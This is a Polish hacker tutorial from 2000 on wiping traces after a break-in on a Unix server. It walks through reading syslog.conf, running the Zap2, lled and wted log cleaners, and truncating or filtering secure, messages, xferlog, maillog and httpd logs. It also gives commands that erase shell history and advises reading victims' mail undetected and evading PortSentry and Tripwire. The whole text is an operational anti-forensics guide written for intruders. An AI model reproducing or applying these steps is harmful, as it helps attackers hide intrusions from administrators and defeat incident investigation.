
Dokladne czyszczenie logow. -  ver. 1.0
======================== 
 writen by sky0ne -- sierpien 2000
========================

1. Od czego zaczac ?
2. Zaczynamy bajke o logach !!
 * Zap2
 * Inne programy  
    - lled  
    - wted
3. Pozostale logi
    - secure
    - messages
    - xferlog
    - maillog
    -  .bash_history
    - logi httpd
    - Tripwire
    - wazne !!
4. Koniec bajki o logach !!

[1] Od czego zaczac ?


Kiedy juz zdobedziesz roota na jakims servie musisz najpierw 
upewnic sie jakie pliki z logami znajduja sie na tym serverze.
W tym celu powinienes obejrzec plik /etc/syslog.conf

# Log all kernel messages to the console.
# Logging much else clutters up the screen.
#kern.* /dev/console
# Log anything (except mail) of level info or higher.
# Don't log private authentication messages!
*.info;mail.none;authpriv.none /var/log/messages
# The authpriv file has restricted access.
authpriv.* /var/log/secure
# Log all the mail messages in one place.
mail.* /var/log/maillog
# Everybody gets emergency messages, plus log them on another
# machine.
*.emerg *
# Save mail and news errors of level err and higher in a
# special file.
uucp,news.crit /var/log/spooler
# Save boot messages also to boot.log
local7.* /var/log/boot.log


To co tu widzisz to standardowa konfiguracja tego pliku na RH 6,0.
Na wielu linuxach jest podobnie.Mysle ze nie musze tlumaczyc
poszczegolnych linii pliku gdyz chyba kazdy zrozumie o co chodzi.
Oczywiscie mozna dodawac sciezki logow  do tego pliku. Np na wielu serverach w
/etc/syslog.conf znajduja sie  sciezki ktore powoduja wysylanie logow mailem
do innego hosta lub powiadamianie uprawnionych osob w inny sposob. Spotkalem
sie tez kiedys ze skryptami ktore wysylaja dziwne logi do danej
osoby na pager. ;]

*.=info;*.=notice                               /var/log/messages 
*.=debug                                        /var/log/debug 
*.warn                                          /var/log/syslog 
*.warn                                          /root/.../syslog 
*.=crit;kern.none                               /var/log/critical 
kern.info;kern.!err                             /var/log/kernel-info 
mail.*;mail.!=info                              /root/.../mail 
mail,news.=info                                 /root/.../info 
mail.*;mail.!=info                              /var/log/mail 
mail,news.=info                                 /var/log/info 
*.alert                                         root,bob 
*.=info;*.=notice                               @poland.com 
*.=debug                                        @poland.com 
*.warn                                          @poland.com 
*.=crit;kern.none                               @poland.com 
kern.info;kern.!err                             @poland.com 
mail.*;mail.!=info                              @poland.com 
mail,news.=info                                 @poland.com 

Widac tu ze sporo logow wysylanych jest do jakiegos hosta na @poland.com.
Widac tez ze czesc logow wysylana jest do ukrytych katalogow np:
*.warn                                          /root/.../syslog 
mail.*;mail.!=info                              /root/.../mail 

Trzeba zawsze pamietac o tym ze  im lepszy server, tym modrzejszy admin, 
 i znacznie lepszy system logowania. ;] ( co do adminow to roznie bywa :) )
Dlatego czasem warto tuz przed wlamaniem edytowac plik /etc/syslog.conf,
jesli to mozliwe, i przekonac sie na co sie rzuca :) Chodzi mi glownie 
o przesylanie logow do innego hosta do ktorego mozemy nie miec dostepu.
  
Nie jest oczywiscie tak zle. Na wielu serverach wciaz pozostaje zwykla 
konfiguracja. Wlasnie z niej dowiadujemy sie jakie logi sa na servie
i jakie musimy wyczyscic. Czasami rowniez jest tak ze tylko nie ktore logi
wysylane sa do jakiegos hosta albo kopiowane gdzies indziej. 
Czasem nie bedziemy mogli urzyc komendy su gdyz log o jej urzyciu bedzie
wyslany do innego hosta ale bedziemy mogli pozostac niewidzialni poniewaz
wtmp,utmp,lastlog beda wciaz tylko lokalnie zapisywane. Zatem 
zawsze warto doglebnie przanalizowac plik /etc/syslog.conf

[2] Zaczynamy !!

No to przystepujemy do dzialania, wiemy juz jakie logi znajduja sie w systemie.
Uwaga !! Na wielu serverach admini celowo ukrywaja pewne logi w celu 
utrzymania ostatniej deski ratunku :) Takie logi musimy sami znalesc.
Czesto zdarza sie ze admin gdzies ukryje kopie jakiegos loga zadeklarowanego
w /etc/syslog.conf. Czyscimy te logi ktore dotycza uslug z ktorych
korzystalismy podczas wlamania lub ktore wykorzystalismy do swoich celow :)
Np, jesli wlamalismy sie przez httpd to powinnismy odnalesc w pliku 
/etc/syslog.conf logi dotyczace tej uslugi i usunac z nich slady swojej
obecnosci.

[user@iom ]# w 
 
5:36am  up 18 days,  8:23,  1 user,  load average: 0.01, 0.00, 0.00 
User     tty       login@  idle   JCPU   PCPU  what 
user   ttyp1     5:35am                      w

Jestesmy sami. Zawsze warto (nawet trzeba) urzywac komendy w
Zawsze moze byc tak ze ktos bedzie zalogowany na servie oprocz nas.
Aby stac sie niewidzialnym po wpisaniu komend w,who,finger
musimy wyczyscic plik /var/run/utmp. Aby to zrobic urzywamy
programu o nazwie "Zap2" 


Program ma zdefiniowane trzy wazne linie. Dlatego najpierw edytujemy zrodlo

#define WTMP_NAME "/var/log/wtmp" 
#define UTMP_NAME "/var/run/utmp" 
#define LASTLOG_NAME "/var/log/lastlog" 

Sa tu zdefiniowane sciezki do logow ktore znajdziecie w /etc/syslog.conf
Po wpisaniu odpowiednich sciezek ktore na roznych systemach moga byc rozne. 
kompilujemy program i odpalamy go.
 
[user@iom ]# cc zap2.c -o z2
[user@iom ]#./z2 user
Zap2! 

Taki powinien byc efekt odpalonego zapa. W tej chwili nasza obecnosc zostala
wykasowana z nastepujachy logow : wtmp,utmp,lastlog

[user@iom ]# w 
5:36am  up 18 days,  8:23,  1 user,  load average: 0.01, 0.00, 0.00 
User     tty       login@  idle   JCPU   PCPU  what 

Widac ze po wpisaniu komendy "w" nie ma na liscie "user". Podobnie jest
z listami po komendach who i finger. Wynika z tego ze  jestesmy 
niewidzialni. :) Ale to rzecz jasna nie koniec ;]

[*] Inne programy

Warto urzyc jeszcze dwoch innych programow. Sa to "lled" i "wted".
lled czysci log o nazwie lastlog, a wted czysci wtmp. 

----  lled ----


Przed kompilacja, w zrodle podobnie jak przy zapie nalerzy wpisac 
odpowiednia sciezke do lastlog 

char *file="/var/log/lastlog";

[user@iom ]#cc lled.c -o lled
[user@iom ]#./lled
Usage: lled -h -f FILE -a -z -b -x -u USER -n USER -e USER -c HOST 
-h      This help 
-f      Use FILE instead of default 
-a      Show all entries found 
-u      Show all entries for USER 
-b      Show NULL entries 
-e      Erase USER completely 
-c      Erase all connections containing HOST 
-z      Show ZAP'd entries 
-x      Attempt to remove ZAP'd entries completely 

Poniewaz program moze czasem przy opcji -u pokazywac liste z niepelnymi 
wpisami polecam urzyc nastepujacego polecenia: 
Jesli domena z ktorej sie lacze to poland.com to polecenie powinno byc takie:

lled -e user -c poland.com 
Jesli chcesz zobaczyc swoje wpisy w lastlog mozesz urzyc polecenia:
lled -a 
Twoje wpisy powinny znajdowac sie na koncu listy.

Kiedy program zakonczy wymazywanie musimy wykonac komendy:
chmod 644 lastlog.tmp; mv lastlog.tmp /var/log/lastlog

Mozemy jeszcze edytowac programem plik lastlog i przekonac sie
czy wszystko zostalo dobrze wyczyszczone. 
Czasem lled moze spowodac pojawienie sie komunikatu 
"segmentation foult" ale jest to prawdopodobnie spowodowane
roznym dzialaniem programu na roznych systemach choc nie tylko.

---- wted ----

Przed kompilacja, w zrodle podobnie jak przy zapie i lledzie nalerzy wpisac 
odpowiednia sciezke do wtmp

char *file="/var/log/wtmp";

[user@iom ]#cc wted.c -o wted
[user@iom ]#./wted
Usage: wted -h -f FILE -a -z -b -x -u USER -n USER -e USER -c HOST 
            -h      This help 
            -f      Use FILE instead of default 
            -a      Show all entries found 
            -u      Show all entries for USER 
            -b      Show NULL entries 
            -e      Erase USER completely 
            -c      Erase all connections containing HOST 
            -z      Show ZAP'd entries 
            -x      Attempt to remove ZAP'd entries completely  

Urzywamy najlepiej komendy:
[user@iom ]#./wted -x-e user
Nastepnie:
chmod 644 wtmp.tmp; mv wtmp.tmp /var/log/wtmp

[3] Pozostale logi

Oczywiscie oprocz wczesniej wymienionych logow 
jest jescze wiele innych i wcale nie musza byc one umieszczone w
/etc/syslog.conf
Sa to:
secure
messages
xfer
maillog

Jesli nie znajdziemy sciezek do tych plikow w /etc/syslog.conf
mozemy urzyc komendy:
[user@iom ]#find / -name nazwalogu
np
[user@iom ]#find / -name messages
/var/log/messages

Jak czyscic takie logi. 

---- messages ----

Do tego logu zapisywanych jest bardzo duzo informacji w zalerznosci 
od tego co wpiszemy w /etc/syslog.conf

Jesli chcemy usunac z messages nazwe hosta z korego sie wlamalismy mozemy 
urzyc komendy:
grep -v "nazwahosta" /var/log/messages > jakisplik
mv jakisplik /var/log/messages

Oczywiscie zamiast "nazwahosta" mozemy wpisac kazdy inny wyraz ktory chcemy
usunac.

Mozemy jeszcze edytowac plik messages i recznie wykasowac niepozadane linie
lub urzyc komendy:
echo -n > /var/log/messages -- ktora spowoduje zalkowite wyczyszczenie logu.
Tej ostaniej metody niepolecam wzgledem messages. Pusty plik moze byc szybko
zauwarzony przez admina tym bardziej iz jest do niego zapisywanych masa lini.

---- secure ---- 
find / -name  secure
/var/log/secure - lub inna sciezka

echo -n > /var/log/secure

---- xferlog ----

Po znalezieniu pliku to samo co wyzej:
echo -n > /var/log/xferlog
ale polecam raczej "grep -v" 

---- maillog ----

echo -n > /var/log/maillog
rowniez lepiej "grep -v"
Ten log zawiera wszytskie wpisy dotyczace maila. Takze jesli cos wysylales lub
odbierales to napewno zostanie to tu zapisane.

Przy tym jedna wazna uwaga !!
Nigdy nie nalerzy urzywac do czytania poczty programow mailowych typu mail czy
pine i innych. Jesli juz musisz przeczytac jakis list to zrob to przez edycje
pliku /var/spool/mail lub innych plikow znajdujacych sie w katalogach domowych
urzytkownikow.

Wielokrotnie w systemach znajduja sie jeszcze inne logi ktorych nie wymienilem.
Dotycza one roznych uslug np apacha ktorego logi znajduja sie standardowo 
w katalogu : /var/log/httpd
Jesli musisz je wyczyscic to mozesz urzyc komendy echo -n > plik

Coraz czesciej modrzejsi admini urzywaja "port sentry". Program do blokowania 
skanowan systemu na ktorym program sie znajduje. Jesli przed jaka kolwiek
akcja skanowalismy system-ofiare i skanowanie nie dalo pozadanego efektu 
to mozemy sie spodziewac ze na tym systemie znajduje sie port sentry lub cos 
w tym rodzaju choc oczywiscie nie musza to byc takie programy. 
Kilkakrotnie spotkalem sie juz z tym ze logi od port sentry znajduja sie
w katalogu /var/log/portsentry. Ostatni czlon moze sie troche roznic.

Jesli jestesmy przekonani ze wszytskie logi zostaly juz wyczyszczone i nie 
pozostawilismy zadnych sladow warto jescze urzyc komend:

cd /var/log/
grep twojhost * |more oraz
grep twojeip * |more np
grep poland.com * |more
Jesli w wyzej wymienionym katalogu, po wydaniu polecenia, nic sie nie
pokazalo tzn ze poprawnie wyczyscilismy logi  z podanej lokacji.
Takie polecenie powinnismy stosowac we wszytskich katalogach 
w ktorych znajduja sie logi. 

---- .bash_history ----

Jesli chcemy sie wylogowac ze zhaczonego servera powinnismy urzyc bardzo
waznych komend.

echo -n > .bash_history; kill -9 0

Komedna spowoduje wyczysczenie pliku .bash_history, nie dopusci do zapisania
czegokolwiek to tego pliku z ostatniej sesji oraz wyloguje nas z konta. 

Taka komende powinnismy stosowac zawsze  i to dotyczy wszystkich
.bash_history znajdujacych sie w katalogach domowych userow z ktorych
korzystalismy podczas wlamania. 

Inna ciekawa metoda jest komenda: "unset HISTFILE" .
Komenda powinno sie wpisywac zawsze tuz po zalogowaniu na dane konto.
Spowoduje ona ze pliki historii beda kasowane przy wylogowaniu z konta.
Trzeba wiedziec ze standardowo tuz po wylogowaniu wszytskie nasze komendy 
wpisane podczas sesji na koncie sa zapisywane do pliku .bash_history.
Po wydaniu komendy "unset HISTFILE"  bedzie dokladnie odwrotnie.

---- Tripwire ----

Skoro wlamalismy sie do jakiegos systemu to nigdy nie powinnismy nic kasowac.
Dotyczy to rowniez w duzej mierze logow. Ten kto kasuje logi ma zdecydowanie
male pojecie o wlamywaniu sie. Zdarzaja sie programy typu Tripwire  slurzace
do wykrywania wszelkich zmian w plikach.  Dla admina to bardzo duza pomoc
w wykrywaniu wlamania, w ustalaniu  jak duze sa zniszczenia. 
Wiecej o Tripwire i podobnych napisze w nastepnej wersji faq'u.

---- wazne !! ----

- Na koniec jeszcze cos : jesli kilkakrotnie logujesz sie na haczony server 
to po kazdym zalogowaniu wyczysc utmp, wtmp i lastlog. Podobnie jest jak 
logujesz sie ze shaczonego serva na jakies konto ale z reguly takich rzeczy
sie nie robi !!

- Po kazdym czyszczeniu logow powinienes zresetowac "syslogd", w przeciwnym
razie  poprzednia zawartosc logow moze zostac szybko odzyskana !!

---------------------------------------------------------
4. Koniec bajki o logach !!

No to tyle w tej wersji, w nastepnej beda jescze inne rzeczy :)
A puki co:

=====  greetz to all of the IOM group and some others hackiers  =====